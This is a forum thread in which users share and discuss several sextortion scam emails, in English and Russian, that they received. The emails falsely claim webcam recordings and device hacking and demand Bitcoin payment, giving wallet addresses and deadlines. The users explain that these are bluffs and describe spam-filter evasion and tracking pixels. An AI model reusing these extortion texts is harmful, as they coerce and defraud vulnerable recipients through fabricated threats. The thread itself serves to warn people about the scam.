Тогда это просто блеф, конечно.
  • Grot666

I'll begin with the most important. I hacked your device and then got access to all your accounts... Including ////////// It is easy to check - I wrote you this email from your account. Also I have an old password for the hacking day: ///////// Moreover, I know your intim secret, and I have proof of this. You do not know me personally, and no one paid me to check you. It is just a coincidence that I discovered your mistake. In fact, I posted a malicious code (exploit) to an adult site, and you visited this site... While watching a video Trojan virus has been installed on your device through an exploit. This darknet software working as RDP (remote-controlled desktop), which has a keylogger, which gave me access to your microphone and webcam. Soon after, my software received all your contacts from your messenger, social network and email. At that moment I spent much more time than I should have. I studied your love life and created a good video series. The first part shows the video that you watched, and the second part shows the video clip taken from your webcam (you are doing inappropriate things). Honestly, I want to forget all the information about you and allow you to continue your daily life. And I will give you two suitable options. Both are easy to do. First option: you ignore this email. The second option: you pay me $700(USD). Let's look at 2 options in detail. The first option is to ignore this email. Let me tell you what happens if you choose this path. I will send your video to your contacts, including family members, colleagues, etc. This does not protect you from the humiliation that you and your family need to know when friends and family members know about your unpleasant details. The second option is to pay me. We will call this "privacy advice." Now let me tell you what happens if you choose this path. Your secret is your secret. I immediately destroy the video. You continue your life as if none of this has happened. Now you might think: "I'll call to police!" Undoubtedly, I have taken steps to ensure that this letter cannot be traced to me, and it will not remain aloof from the evidence of the destruction of your daily life. I don't want to steal all your savings. I just want to get compensation for my efforts that I put in to investigate you. Let us hope that you decide to create all this in full and pay me a fee for confidentiality. You make a Bitcoin payment (if you don't know how to do it, just enter "how to buy bitcoins" in Google search) Shipping amount: $700(USD). Getting Bitcoin Addresses: 1FVuyuSN41aa3JN9sn8qkuD2PmaMEMHHnc (This is sensitive, so copy and paste it carefully) Don't tell anyone what to use bitcoins for. The procedure for obtaining bitcoins can take several days, so do not wait. I have a spetial code in Trojan, and now I know that you have read this letter. You have 48 hours to pay. If I don't get BitCoins, I'll send your video to your contacts, including close relatives, co-workers, and so on. Start looking for the best excuse for friends and family before they all know. But if I get paid, I immediately delete the video. This is a one-time offer that is non-negotiable, so do not waste my and your time. Time is running out. Bye!
  • VirusHunter

Такое же письмо сейчас получил. Тема письма - Security Notice. Someone have access to you system. Вобщем, детский сад продолжается.))
  • Grot666

Hello! I have very bad news for you. 15/10/2018 - on this day I hacked your OS and got full access to your account On this day your account has password: So, you can change the password, yes.. But my malware intercepts it every time. How I made it: In the software of the router, through which you went online, was a vulnerability. I just hacked this router and placed my malicious code on it. When you went online, my trojan was installed on the OS of your device. After that, I made a full dump of your disk (I have all your address book, history of viewing sites, all files, phone numbers and addresses of all your contacts). A month ago, I wanted to lock your device and ask for a not big amount of btc to unlock. But I looked at the sites that you regularly visit, and I was shocked by what I saw!!! I'm talk you about sites for adults. I want to say - you are a BIG pervert. Your fantasy is shifted far away from the normal course! And I got an idea.... I made a screenshot of the adult sites where you have fun (do you understand what it is about, huh?). After that, I made a screenshot of your joys (using the camera of your device) and glued them together. Turned out amazing! You are so spectacular! I'm know that you would not like to show these screenshots to your friends, relatives or colleagues. I think $720 is a very, very small amount for my silence. Besides, I have been spying on you for so long, having spent a lot of time! Pay ONLY in Bitcoins! My BTC wallet: 1DiEqE5R1Ktu7QCLUuJN31PNtpoBU41x2E You do not know how to use bitcoins? Enter a query in any search engine: "how to replenish btc wallet". It's extremely easy For this payment I give you two days (48 hours). As soon as this letter is opened, the timer will work. After payment, my virus and dirty screenshots with your enjoys will be self-destruct automatically. If I do not receive from you the specified amount, then your device will be locked, and all your contacts will receive a screenshots with your "enjoys". I hope you understand your situation. - Do not try to find and destroy my virus! (All your data, files and screenshots is already uploaded to a remote server) - Do not try to contact me (you yourself will see that this is impossible, I sent you an email from your account) - Various security services will not help you; formatting a disk or destroying a device will not help, since your data is already on a remote server. P.S. You are not my single victim. so, I guarantee you that I will not disturb you again after payment! This is the word of honor hacker. I also ask you to regularly update your antiviruses in the future. This way you will no longer fall into a similar situation. Do not hold evil! I just do my job. Good luck.
  • Grot666

Hi! As you may have noticed, I sent you an email from your account. This means that I have full access to your account: At the time of hacking your account had this password:  You can say: this is my, but old password! Or: I can change my password at any time! Of course! You will be right, but the fact is that when you change the password, my malicious code every time saved a new one! I've been watching you for a few months now. But the fact is that you were infected with malware through an adult site that you visited. If you are not familiar with this, I will explain. Trojan Virus gives me full access and control over a computer or other device. This means that I can see everything on your screen, turn on the camera and microphone, but you do not know about it. I also have access to all your contacts and all your correspondence from e-mail and messangers. Why your antivirus did not detect my malware? Answer: My malware uses the driver, I update its signatures every 4 hours so that your antivirus is silent. I made a video showing how you satisfy yourself in the left half of the screen, and in the right half you see the video that you watched. With one click of the mouse, I can send this video to all your emails and contacts on social networks. I can also post access to all your e-mail correspondence and messengers that you use. If you want to prevent this, transfer the amount of $775 to my bitcoin address (if you do not know how to do this, write to Google: "Buy Bitcoin"). My bitcoin address (BTC Wallet) is: 15G9wyGRDssFXsfwEm1ihdJs2xabVPDu68 After receiving the payment, I will delete the video and you will never hear me again. I give you 48 hours to pay. I have a notice reading this letter, and the timer will work when you see this letter. Filing a complaint somewhere does not make sense because this email cannot be tracked like my bitcoin address. I do not make any mistakes. If I find that you have shared this message with someone else, the video will be immediately distributed. Bye!
  • VirusHunter

Ну так я же писал, что тексты старые, просто немного изменены отдельные фрагменты.
  • Grot666

После месяца тишины пришло письмо. Дают 5 дней иначе файл разошлют файл. Требуют 2 тыс долларов. Письмо как и всегда попало в раздел Спам.
  • VirusHunter

Мне постоянно, раз в несколько дней, приходят те же письма. Отличия немного в формулировках текста, поменялись заголовки писем и отправитель, зачастую, вымышленный адрес емэил (варьируется). Главное же отличие большинства писем - это тексты в форме приложенных фотографий, или фото встроены прямо в оформление текста писем. А так - всё по-прежнему.
  • Grot666

Что за фото? 
  • VirusHunter

Тело письма с текстом имеет графический формат - как если бы текст сфотографировали и вставили, как графический объект. Скорее всего, это было сделано вымогателями для временного обхода спам-фильтров.
  • Grot666

Интересно. А мне такие письма пока не приходили).
  • CyberMax

Сегодня мне тоже пришла подобная картинка на почту моего сайта.
Тема письма: "Attention! read this email".
В тексте на картинке никаких паролей нет.
В исходнике письма обратный адрес: Return-Path:
Ещё есть адрес для абуз: X-Complaints-To:
Имеет ли смысл перенаправить туда это письмо (надеюсь, что если найдут этих китайцев, то их не расстреляют) или не имеет смысла?
  • VirusHunter

CyberMax, отправлять письма куда-то смысла нет - все адреса "отправителей" генерируются из случайных фрагментов программами для рассылки Спама и в реальности таких адресов не существует.
  • VirusHunter

Привет всем. Постепенно практически утихнув, рассылка устрашающего спама приняла немного иное русло: злоумышленники, как я понимаю, начали рассылать "страшные письма" на все адреса эл. почты, которые находят на страницах Интернета. Причём делают это, скорее всего, выходцы из России или Украины - письма на русском языке, причём текст написан довольно таки грамотно (не считая недостающих знаков препинания) и не похож на машинный перевод с других языков. Лично мне пришла вот такая страшилка:

Тема сообщения:
Обнаружено несанкционированное проникновение в вашу систему


Текст:
3дрaвcтвуйте!
Представлюсь: я тот человек который 2 месяца назад при помощи порносайта проник в ваше устройство и получил полный доступ к информации находящейся в нем, а также к камере и микрофону.

Все это время я наблюдаю за вашими сообщениями и тем, какие сайты вы посещаете. Некоторый контент меня крайне удивил.

Недавно у меня возникла отличная идея: сделать видео где в одной части экрана удовлетворяете себя, а в другой видео, которое в тот момент проигрывалось. Получилось очень занятно!

Не сомневайтесь, что я могу буквально в пару кликов мыши разослать это видео по всем вашим контактам. Я думаю вы бы хотели предотвратить подобное развитие событий.

Поэтому вот мое предложение. Вы переводите сумму эквивалентную 700 долларам на мой биткоiiн кошелек и мы забываем друг о друге, а все данные и видео я удаляю навсегда.

Это не так много, учитывая что я очень много потратил времени и сил на слежку за вами.
Как купить биткоiiн вы легко сможете найти при помощи поисковых систем по типу yandex или google

Мой адрес в биткоiiнах:

3HixXf9tgejSjiFjP4KMtKGWPBb7gDsfZ5

У вас есть 60 часов, чтобы произвести оплату. (У меня есть уникальный пиксель в этом электронном сообщении, и прямо сейчас я знаю, что вы прочитали это сообщение). Если я не получу оплату, я отправлю ваше видео всем вашим контактам, включая родственников, коллег и так далее.


Также в коде письма содержатся зашифрованные участки кода, содержащие поддельные данные подлинности об источнике отправки писем (дабы обойти спам-фильтры почтовых серверов), и, очевидно, зашифрованная ссылка на картинку в Интернете, имеющую размер в теле письма всего 1 пиксель, при помощи которой (в зависимости от условий открытия письма и др. факторов) злоумышленники могут узнать об открытии отосланного ими письма. Сделано это для идентификации активности адресов, на которые рассылаются афёрные письма с вымогательством денег.


Профессия будущего - Блогер
Кто такой блогер и как им стать?
Сколько времени нужно тратить, чтобы добиться успеха?
На эти и другие вопросы вы найдете ответы на DaXa